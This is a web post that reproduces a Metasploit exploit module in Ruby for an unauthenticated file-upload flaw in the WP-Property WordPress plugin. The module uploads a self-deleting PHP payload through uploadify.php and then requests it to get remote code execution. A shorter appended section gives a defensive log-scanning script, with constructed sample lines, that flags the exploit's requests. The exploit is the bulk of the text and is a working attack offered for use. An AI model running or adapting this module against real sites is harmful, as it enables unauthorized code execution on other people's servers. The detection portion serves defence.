WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
```

Don't ask me what this says or how to use it. I'm talking about msf.
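For defenders, the three requests the module above makes (a GET to `uploadify.php` in `check`, a multipart POST to it, then a GET for the returned `.php` path) leave a recognizable trail in web-server access logs. The following is an added example, not part of the original post or of Metasploit: it assumes Combined Log Format, the name `scan_access_log` is hypothetical, and the sample log lines are constructed.

```ruby
# Added example, not part of the original post.
PLUGIN_DIR = '/wp-content/plugins/wp-property/third-party/uploadify/'
ENDPOINT   = /#{Regexp.escape(PLUGIN_DIR)}uploadify\.php\z/i
DROPPED    = /#{Regexp.escape(PLUGIN_DIR)}[^\/]+\.php\z/i
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE   = /\A(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /

# Returns one finding per suspicious log line, in log order.
def scan_access_log(lines)
  uploaders = {} # client IPs that have POSTed to uploadify.php
  findings = []
  lines.each_with_index do |line, idx|
    m = LOG_LINE.match(line)
    next unless m # skip lines that are not in the assumed format
    ip, method, target, status = m.captures
    path = target.split('?', 2).first
    if path =~ ENDPOINT
      # Unauthenticated upload handler: POST = upload, anything else = probe.
      kind = method == 'POST' ? :upload_attempt : :endpoint_probe
      uploaders[ip] = true if method == 'POST'
    elsif path =~ DROPPED
      # Any other PHP file served from the uploadify directory is unexpected;
      # it is correlated when the same client uploaded earlier in the log.
      kind = uploaders[ip] ? :uploaded_file_requested : :php_in_upload_dir
    else
      next
    end
    findings << { line: idx + 1, ip: ip, kind: kind, status: status.to_i }
  end
  findings
end

# Constructed sample lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = [
  '198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "-"',
  "203.0.113.9 - - [04/Jan/2013:19:41:10 +0800] \"GET /wordpress#{PLUGIN_DIR}uploadify.php HTTP/1.1\" 200 0 \"-\" \"-\"",
  "203.0.113.9 - - [04/Jan/2013:19:41:12 +0800] \"POST /wordpress#{PLUGIN_DIR}uploadify.php HTTP/1.1\" 200 71 \"-\" \"-\"",
  "203.0.113.9 - - [04/Jan/2013:19:41:13 +0800] \"GET /wordpress#{PLUGIN_DIR}AbCdE.php HTTP/1.1\" 200 0 \"-\" \"-\"",
  '198.51.100.7 - - [04/Jan/2013:19:45:00 +0800] "GET /wordpress/wp-login.php HTTP/1.1" 200 2310 "-" "-"'
]

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

Because the destination `folder` is a field of the upload request, every `upload_attempt` is worth reviewing even when no follow-up request inside this directory appears.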